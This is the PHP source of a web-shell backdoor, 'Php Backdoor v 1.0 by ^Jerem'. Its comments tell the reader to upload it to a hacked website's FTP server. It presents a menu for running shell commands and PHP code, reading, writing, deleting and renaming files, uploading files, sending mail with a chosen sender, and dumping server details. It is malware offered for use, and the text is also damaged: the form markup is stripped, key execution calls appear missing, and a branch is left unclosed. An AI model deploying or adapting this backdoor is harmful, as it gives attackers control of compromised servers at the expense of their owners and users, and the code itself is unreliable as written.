// ################################
// Php Backdoor v 1.0 by ^Jerem
// ################################
// ################################
// This backdoor coded in php allows
// allows to control a web serv ...
// For use this script upload this
// on the ftp server of the hacked
// web site. Enjoy ^^
// ################################
// ################################
// Author: ^Jerem
// Mail: jerem@x-perience.org
// Web: http://www.x-perience.org
// ################################
echo '';
echo '
Php Backdoor v 1.0 by ^Jerem ';
echo ' ';
echo '';
echo '';
echo 'Php Backdoor v 1.0 by ^Jerem ';
echo ' ';
echo ' ';
echo 'Backdoor option list: ';
echo '• Backdoor index ';
echo '• Execute a shell code ';
echo '• Execute a php code ';
echo '• Files Management ';
echo '• Upload a file ';
echo '• Files listing ';
echo '• Send a Email ';
echo '• Infos serv ';
if ($action == "shell") {
echo ' ######################### ';
echo 'Enter shell code to execute: ';
echo '';
} elseif ($action == "shellgo") {
echo ' ######################### ';
$cmd = stripslashes($cmd);
echo 'The shell code '.$cmd.' as been executed on server. ';
echo 'The server with answered this your request: ';
} else if ($action == "mail") {
echo ' ######################### ';
echo '';
echo 'Enter the expeditor Email: ';
echo ' ';
echo 'Enter the receptor Email: ';
echo ' ';
echo 'Enter the topic of your Email: ';
echo ' ';
echo 'Enter the Email content: ';
echo ' ';
echo ' ';
} else if ($action == "mailgo") {
echo ' ######################### ';
echo 'Your Email have been sended to '.$recpt.' . ';
$hd = 'From:'.$exp.' \r\nReply-To:'.$exp.'';
} else if ($action == "up") {
echo ' ######################### ';
echo '';
echo 'Select a file to upload: ';
echo ' ';
echo 'Enter the name of file in the server: ';
echo ' ';
echo ' ';
} else if ($action == "upgo") {
echo ' ######################### ';
copy($file, $fts);
echo 'Your file was succelify uploaded on server.';
} else if ($action == "listing") {
echo ' ######################### ';
echo 'Files listing of / ';
} else if ($action == "infos") {
echo ' ######################### ';
echo 'Server informations ';
echo 'Backdoor file: '.$SCRIPT_NAME.' ';
echo 'Backdoor URL: '.$SCRIPT_FILENAME.' ';
echo 'OS & PhpVersion: '.$SERVER_SOFTWARE.' ';
echo 'Admin Email: '.$SERVER_ADMIN.' ';
echo 'Server name: '.$SERVER_NAME.' ';
echo 'Server cookie: ';
echo 'Server ip: '.$SERVER_ADDR.' (Running on port '.$SERVER_PORT.' ) ';
echo 'CGI Version: '.$GATEWAY_INTERFACE.' ';
echo 'Request Method: '.$REQUEST_METHOD.' ';
echo 'HTTP Protocol Version: '.$SERVER_PROTOCOL.' ';
echo 'HTTP Heading Accept: '.$HTTP_ACCEPT.' ';
echo 'HTTP User Agent: '.$HTTP_USER_AGENT.' ';
echo 'HTTP Accept Charset: '.$HTTP_ACCEPT_CHARSET.' ';
echo 'HTTP Accept Encodingt: '.$HTTP_ACCEPT_ENCODING.' ';
echo 'HTTP Accept Language: '.$HTTP_ACCEPT_LANGUAGE.' ';
echo 'HTTP Heading Connection Protocol: '.$HTTP_CONNECTION.' ';
echo 'HTTP Heading Host Protocol: '.$HTTP_HOST.' ';
echo ' ######################### ';
echo 'Phpinfo(); ';
echo '';
} else if ($action == "phpinfo") {
} else if ($action == "php") {
echo ' ######################### ';
echo 'Enter php code to execute: ';
echo '';
echo ' ';
echo ' ';
} else if ($action == "phpgo") {
echo ' ######################### ';
$cmd = stripslashes($cmd);
echo 'The php code '.$cmd.' as been executed. ';
echo 'The server with answered this your request: ';
} else if ($action == "files") {
echo ' ######################### ';
echo 'Create a new file: ';
echo '';
echo 'File name: ';
echo ' ';
echo ' ######################### ';
echo 'Delete a file: ';
echo '';
echo 'File name: ';
echo ' ';
echo ' ######################### ';
echo 'Modify a file: ';
echo '';
echo 'File name: ';
echo ' ';
echo ' ######################### ';
echo 'Read a file: ';
echo '';
echo 'File name: ';
echo ' ';
echo ' ######################### ';
echo 'Rename a file: ';
echo '';
echo 'File name: ';
echo 'New name: ';
echo ' ';
} else if ($action == "filenew") {
echo ' ######################### ';
echo 'Your file '.$nfile.' was created susellify ';
} else if ($action == "filedel") {
echo ' ######################### ';
echo 'Your file '.$nfile.' was deleted susellify ';
} else if ($action == "filemod") {
echo ' ######################### ';
echo 'Modifing '.$nfile.' : ';
echo '';
$index = fopen($nfile, "r");
$ct = fread($index, filesize($nfile));
$ct = htmlentities ($ct, ENT_QUOTES);
$ct = nl2br($ct);
echo ''.$ct.' ';
echo ' ';
} else if ($action == "filemodgo") {
echo ' ######################### ';
echo 'You files '.$nfile.' as modified sucellify ';
$index = fopen($nfile, "w");
fwrite($index, stripslashes($newctt));
} else if ($action == "fileread") {
echo ' ######################### ';
echo 'Reading '.$nfile.' ... ';
$index = fopen($nfile, "r");
$ct = fread($index, filesize($nfile));
$ct = htmlentities ($ct, ENT_QUOTES);
$ct = nl2br($ct);
echo $ct;
} else if ($action == "filename") {
copy($nfile, $newfile);
else {
echo ' ################################ ';
echo 'Php Backdoor v 1.0 by ^Jerem ';
echo '################################ ';
echo 'This backdoor coded in php allows ';
echo 'allows to control a web serv ... ';
echo 'For use this script upload this ';
echo 'on the ftp server of the hacked ';
echo 'web site. Enjoy ^^ ';
echo '################################ ';
echo 'Author: ^Jerem ';
echo 'Mail: jerem@x-perience.org ';
echo 'Web: http://www.x-perience.org ';
echo '';
echo '';